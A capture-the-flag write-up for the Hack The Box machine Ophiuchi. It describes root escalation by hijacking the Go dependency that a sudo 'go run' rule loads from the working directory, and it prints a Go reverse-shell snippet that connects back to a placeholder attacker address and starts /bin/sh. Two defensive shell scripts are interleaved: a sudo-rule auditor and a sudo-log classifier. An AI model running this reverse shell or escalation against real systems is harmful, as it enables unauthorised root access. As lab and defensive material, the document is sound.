HTB Ophiuchi — An Alternate Path To Root
I considered writing a full walkthrough for this box, as it was the first medium-difficulty box I completed on my own. Once the box was retired I read some of the other walkthroughs out there, and honestly the path into the box and the pivot to a user were pretty much the same across the board. I read about five walkthroughs, including the official one released by HTB, to see if there were any variations in the path to root. Surprisingly, none of the write-ups I read used the method I did, so I thought it was worth sharing. We are going to fast forward: assume you already have your initial foothold and have pivoted to the admin account.
Great, you made it this far: you are now logged into the server, presumably over SSH as the admin account. The first thing I did at this point was run
sudo -l
This returns the following output (shown in the original post as a screenshot):
As you can see, we have the ability to run a .go program as root. So I took a look at index.go to get an idea of what it was doing. The short of it is that the script tries to deploy a web app using a wasm file, and if certain criteria are met it fires off a deploy.sh script. The next thing I did was attempt to run the script.
I actually ran it a few times and from a couple of different locations. The first time I was in my home directory and unfortunately didn't grab a screenshot; the second time I was in the /opt directory, which yielded the same output, and I did get a screenshot. Then I ran the script again from /opt/wasmer-go and noticed a difference in where the instance.go file was being called from.
So I decided to copy the wasmer-go directory to my home directory and execute the sudo command from there. To my pleasure, instance.go was now being called from my home directory.
cp -r /opt/wasmer-go ~/wasmer-go
So we know that when index.go is run it relies on a dependency that now lives in my home directory, where I have write access. In the screenshot above you can see a reference to .newInstanceWithImports; I grepped instance.go for newInstanceWithImports and sure enough it was there. So now we know there is a function in instance.go that is called by index.go, which is running with root privileges. That seemed like a great place to introduce a reverse shell.
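The weakness here is not index.go itself but the sudo rule: root runs Go source through the toolchain, so dependencies are resolved at execution time, and `go run` takes the main module from the caller's working directory, which is why the copy in the home directory got used. Below is an added audit script (my own example, not code from the box, the post or the wasmer-go project) that scans sudoers-style rules for this pattern and checks the referenced source tree for group/world-writable or non-root-owned files. The rule lines and paths are constructed assumptions; the box's real `sudo -l` output is only shown as a screenshot in the post.

```shell
#!/bin/sh
# Added example: audit sudo rules for the pattern this post abuses, root running
# source through a toolchain or interpreter so that dependencies are resolved at
# execution time. Sample rules are constructed (sudoers syntax); the Go rule path
# is an assumption, since the post shows the real `sudo -l` output only as a screenshot.
SAMPLE_RULES='admin ALL=(ALL) NOPASSWD: /usr/local/go/bin/go run /opt/wasmer-go/index.go
admin ALL=(ALL) NOPASSWD: /usr/local/bin/deploy
backup ALL=(root) NOPASSWD: /usr/bin/python3 /opt/backup/run.py'

# 0 if the rule's command hands source code to a run-time toolchain or interpreter.
rule_uses_interpreter() {
    case "$1" in
        *"/go run "*|*"/go test "*|*"/python"*|*"/perl "*|*"/ruby "*|*"/node "*|*"/bash "*|*"/sh "*) return 0 ;;
        *) return 1 ;;
    esac
}

# Print the source/script argument of a rule (its last field).
rule_source_path() {
    printf '%s\n' "$1" | awk '{ print $NF }'
}

# 0 if anything at or below the path is group- or world-writable.
writable_by_group_or_world() {
    [ -e "$1" ] || return 1
    hit=$(find "$1" \( -perm -0020 -o -perm -0002 \) -print 2>/dev/null | head -n 1)
    [ -n "$hit" ]
}

# 0 if anything at or below the path is not owned by root.
not_root_owned() {
    [ -e "$1" ] || return 1
    hit=$(find "$1" ! -user root -print 2>/dev/null | head -n 1)
    [ -n "$hit" ]
}

# Print one "RISK:" line per rule that runs source as root, plus what is wrong
# with the referenced tree. A root-owned, non-writable tree is still not enough
# for `go run`: the main module is taken from the caller's working directory,
# which is exactly what the copy to ~/wasmer-go exploited.
audit_rules() {
    while IFS= read -r rule; do
        [ -n "$rule" ] || continue
        rule_uses_interpreter "$rule" || continue
        src=$(rule_source_path "$rule")
        dir=$(dirname "$src")
        echo "RISK: source executed as root at run time: $rule"
        if [ ! -e "$dir" ]; then
            echo "      $dir does not exist on this host (dangling rule)"
        else
            writable_by_group_or_world "$dir" && echo "      $dir has group/world-writable entries"
            not_root_owned "$dir" && echo "      $dir has entries not owned by root"
        fi
        echo "      note: for 'go run', the working directory decides which module is used"
    done <<EOF
$1
EOF
    return 0
}

audit_rules "$SAMPLE_RULES"
```

The durable fix is to grant sudo on a compiled, root-owned binary that has no run-time dependency resolution, rather than on `go run` against a source tree; checking ownership and permissions of the tree, as the script does, catches the obvious cases but not the working-directory problem.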
I opened instance.go in vi and made the following additions.
In the import statement add "os/exec" and "net".
Next, move down to the NewInstanceWithImports function and add the reverse shell. I'm not a Golang programmer, so I borrowed someone else's. Thank you Dan Borges for a really simple reverse shell in Go.
con, _ := net.Dial("tcp", "yourip:yourport") // connect back to the listener; replace with your own IP and port
cmd := exec.Command("/bin/sh")                // shell whose stdin/stdout/stderr are wired to the connection
cmd.Stdin = con
cmd.Stdout = con
cmd.Stderr = con
cmd.Run()
Next, fire up your netcat listener on your chosen port and execute the script with sudo as before.
I then upgraded my reverse shell with Python and captured the root.txt flag.
Thank you for sticking with me; hopefully this alternate method helps you think of additional ways to escalate privileges in the future. If you liked this article and would like to hear about future posts, you can follow me on Twitter @synsandacks.
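On the detection side, sudo records the caller's working directory (PWD=) alongside every command it runs, so the move to ~/wasmer-go leaves a trace even though /opt/wasmer-go was never modified. This added example (mine, not from the post) classifies sudo log lines in the standard syslog format; the sample lines, hostname, timestamps and rule path are constructed.

```shell
#!/bin/sh
# Added example: classify sudo log lines for the move this post makes. sudo logs the
# caller's working directory as PWD= with every command, so running a `go run` rule
# from a user-writable copy leaves a trace even though /opt/wasmer-go is untouched.
# Sample lines are constructed in sudo's syslog format; hostname, times and the rule
# path are assumptions.
SAMPLE_LOG='Mar  1 10:01:12 ophiuchi sudo:    admin : TTY=pts/0 ; PWD=/opt/wasmer-go ; USER=root ; COMMAND=/usr/local/go/bin/go run /opt/wasmer-go/index.go
Mar  1 10:04:51 ophiuchi sudo:    admin : TTY=pts/0 ; PWD=/home/admin/wasmer-go ; USER=root ; COMMAND=/usr/local/go/bin/go run /opt/wasmer-go/index.go
Mar  1 10:05:03 ophiuchi sudo:    admin : TTY=pts/0 ; PWD=/home/admin ; USER=root ; COMMAND=/usr/bin/systemctl status tomcat
Mar  1 10:06:30 ophiuchi sudo:    admin : TTY=pts/1 ; PWD=/opt ; USER=root ; COMMAND=/usr/local/go/bin/go run /opt/wasmer-go/index.go'

# Extract the PWD= and COMMAND= fields from a sudo log line.
log_pwd() { printf '%s\n' "$1" | sed -n 's/.*PWD=\([^ ]*\) ;.*/\1/p'; }
log_cmd() { printf '%s\n' "$1" | sed -n 's/.*COMMAND=//p'; }

# 0 if the command hands source code to a run-time toolchain or interpreter.
command_runs_source() {
    case "$1" in
        *"/go run "*|*"/go test "*|*"/python"*|*"/perl "*|*"/ruby "*|*"/node "*|*"/bash "*|*"/sh "*) return 0 ;;
        *) return 1 ;;
    esac
}

# Print a verdict for one line:
#   writable-cwd  source run as root from a user-writable tree (/home, /tmp, ...)
#   cwd-mismatch  source run as root from somewhere other than the source's own directory
#   ok            nothing to flag
classify_sudo_line() {
    cmd=$(log_cmd "$1")
    cwd=$(log_pwd "$1")
    if ! command_runs_source "$cmd"; then
        echo ok
        return 0
    fi
    case "$cwd" in
        /home/*|/tmp|/tmp/*|/var/tmp|/var/tmp/*|/dev/shm|/dev/shm/*)
            echo writable-cwd
            return 0 ;;
    esac
    src_dir=$(dirname "$(printf '%s\n' "$cmd" | awk '{ print $NF }')")
    if [ "$cwd" != "$src_dir" ]; then
        echo cwd-mismatch
        return 0
    fi
    echo ok
}

# Print every flagged line prefixed with its verdict.
scan_sudo_log() {
    while IFS= read -r line; do
        [ -n "$line" ] || continue
        verdict=$(classify_sudo_line "$line")
        [ "$verdict" = ok ] || echo "$verdict: $line"
    done <<EOF
$1
EOF
    return 0
}

scan_sudo_log "$SAMPLE_LOG"
```

The writable-cwd verdict is the high-confidence one and matches the step taken in this post; cwd-mismatch is weaker (the author also ran the rule from /opt while exploring) but still worth a look, because for `go run` the working directory decides which go.mod, and therefore which copy of instance.go, gets used.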
Thanks for reading!